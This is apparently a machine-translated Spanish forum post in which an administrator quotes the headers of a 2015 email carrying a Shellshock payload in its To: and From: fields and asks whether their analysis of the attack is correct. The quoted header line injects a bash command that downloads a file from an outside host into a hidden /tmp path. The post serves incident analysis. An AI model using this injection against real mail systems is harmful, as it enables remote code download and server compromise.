Hace 2 días recibí el siguiente correo electrónico (este es su formato original no la de ningún remitente, pero cuando la información confidencial se reemplaza por •• field_name ••):
From [email protected] Thu Jul 2 23:59:07 2015
Return-Path: <[email protected]>
X-Original-To: nobody@••my_domain••
Delivered-To: nobody@••my_domain••
Received: from website.com (bearing.headissue.net [178.248.246.217])
by ••my_mail_server•• (Postfix) with SMTP id 9CE261C542901
for <nobody@••my_domain••>; Thu, 2 Jul 2015 23:59:07 +0200 (CEST)
To:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
From:() { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
Status: RO
Content-Length: 0
Lines: 0
- ataque dirigido hacia
Postfix
MX donde el MDA esProcmail
- el
To:
& Los camposFrom:
están orientados a disparar Shellshock enbash
que se usa con frecuencia dentro deProcmail
rules - este ataque habría descargado un malware de un sitio de descarga en Siliguri (India) dentro de
/tmp/._
(archivo oculto a los maniquíes) - en el caso de un
/etc/procmailrc
existente que se ejecuta con los privilegiosroot
, no se habría ejecutado automáticamente ningún riesgo más arriesgado - el origen de la conexión es en München, cerca de la Universidad
- el origen (@IP) del ataque está activado pero no responde a ninguna conexión
tcp
- el malware potencial HTML lleva un 404
Aquí hay algunas hipótesis personales sobre este ataque:
- el sitio de descarga (mlanissan.co.in) fue pirateado, utilizado, detectado y limpiado por sus propietarios
- el sitio de control de ataques (bearing.headissue.net) es muy probablemente un funcionamiento de Unix, fue pirateado, usado y aún no detenido por sus respectivos propietarios, está bien protegido por los hackers
¿Son correctos mi análisis y mi hipótesis?
¿Tienes algún mejor análisis e hipótesis?